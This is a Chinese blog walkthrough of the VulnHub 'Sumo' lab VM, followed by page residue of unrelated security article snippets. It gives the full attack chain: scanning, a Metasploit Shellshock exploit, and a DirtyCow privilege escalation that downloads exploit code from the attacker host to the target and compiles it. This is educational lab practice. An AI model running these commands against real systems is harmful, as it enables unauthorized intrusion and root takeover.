vulnhub之Sumo的实践

VSole2023-06-25 09:11:24

今天实践的是vulnhub的Sumo镜像,

下载地址,https://download.vulnhub.com/sumo/Sumo.zip,

用workstation导入成功,

做地址扫描,sudo netdiscover -r 192.168.177.0/24,

获取到靶机地址192.168.177.141,

继续进行端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.177.141

有web服务,进行漏洞扫描,nikto -h http://192.168.177.141,

发现/cgi-bin/test处存在CVE-2014-6278漏洞,

用msf搜索漏洞利用方案,采用第一个,

use exploit/multi/http/apache_mod_cgi_bash_env_exec

set RHOSTS 192.168.177.141

set TARGETURI /cgi-bin/test

exploit

获取到msf的shell,

getuid确认不是root,需要提权,

sysinfo获取到系统信息,

继续利用脏牛漏洞进行提权,

kali攻击机上下载源码文件,

wget https://www.exploit-db.com/download/40839,

改名,mv 40839 dirty.c,

kali攻击机上开个http下载,python2 -m SimpleHTTPServer,

靶机那边先转成普通shell,

shell,python -c "import pty;pty.spawn('/bin/bash')",

进入临时目录,cd /tmp,

从kali攻击机上下载源码文件,

wget http://192.168.177.138:8000/dirty.c,

编译,gcc -pthread dirty.c -o dirty -lcrypt,密码123456,

成功后,切换账户,su firefart,id确认有root权限,

本周的实践到此结束,本周的实践到此结束,本周的实践到此结束,本周的实践到此结束,本周的实践到此结束。

sumo
本作品采用《CC 协议》,转载必须注明作者和本文链接
vulnhub之Sumo的实践
2023-06-25 09:11:24
今天实践的是vulnhub的Sumo镜像,下载地址,https://download.vulnhub.com/sumo/Sumo.zip,用workstation导入成功,做地址扫描,sudo netdiscover -r 192.168.177.0/24,获取到靶机地址192.168.177.141,继续进行端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.17
分析指出,企业很大程度上并不了解自身安全态势,SIEM普遍检测不出76%的攻击战术、技术与程序(TTP)。
如何进行云合规监控
2022-07-20 13:43:25
未能满足合规要求可能导致被行业团体开除、巨额罚款,最坏的情况是被起诉。为了应对这些要求,公司的法律部门应该有一份合规标准清单。常见合规标准或法规包括GDPR、Sarbanes-Oxley法案、HIPAA和PCI DSS。其他是运行时考虑因素,这意味着应用程序需要在操作期间进行监视以验证合规性。团队必须确定执行和记录每个适用标准要求的工具。
如今,非人类(Non-humans)身份可谓无处不在。日常生活中,每天都有很多的非人类实体与我们互动:智能恒温器程序会在特定时间为房子降温;手机上的应用程序会向用户推荐搜索过的信息等等。非人类身份已经渗透到我们生活的方方面面,囊括个人生活和职业生涯。
DerpnStink靶场
2023-01-12 11:40:41
DerpnStink信息收集使用nmap进行深度扫描,发现开放了21和22端口,以及80端口,80端口为wordpress应用,存在wordpress登陆apiNmap scan report for 10.0.3.4
人们还看到,一些安全主管因隐瞒数据泄露而被判入狱。他们还需要报告安全事件并制定应对计划。Lehmann表示,企业开始加大力度跟踪开源软件,因为他们发现对他们使用的软件的来源和质量进行未经验证的信任会造成损害。Iqbal认为,一个良好的AppSec程序应该是软件开发生命周期的一部分。2023年,防范这些威胁仍将是一个复杂的过程。
Munro补充说,企业应该调整心态,积极主动地为即将到来的法规做好准备。应该更好地跟踪开源软件2021年底爆发的Log4j安全危机在2022年持续了几乎一整年,影响了全球数以万计的组织。到2023年,防范此类威胁仍将是一个复杂的过程。网络安全保险需求可能会继续增加近年来,网络安全保险已成为必需品,但保费却有所增加。此外,组织还面临着保险公司的更多审查,以确定风险领域。
痛苦的纯文本日志管理日子一去不复返了。虽然纯文本数据在某些情况下仍然很有用,但是在进行扩展分析以收集有洞察力的基础设施数据并改进代码质量时,寻找一个可靠的日志管理解决方案是值得的,该解决方案可以增强业务工作流的能力。 日志不是一件容易处理的事情,但无论如何都是任何生产系统的一个重要方面。当您面临一个困难的问题时,使用日志管理解决方案要比在遍布系统环境的无休止的文本文件循环中穿梭容易得多。
到 2022 年,网络安全将继续成为企业领导者的严重关切。勒索软件以及恶意和意外威胁,再加上日益严格的数据法规,使公司有责任加强安全和数据使用预防措施。在这里,数据安全领导者分享了他们对未来数据新危险和阻碍它们的机会的看法。
2021年将成为网络安全并购活动异常活跃的一年。SecBI公司以其自动化威胁检测和响应能力而闻名,9月1日,LogPoint宣布已与SecBI方达成收购协议。企业安全提供商Check Point Software Technologies已收购云电子邮件安全公司Avanan。此次收购不仅扩大了 HackerU的地理覆盖范围,还将其产品范围扩大到了所有安全职业点。
VSole
网络安全专家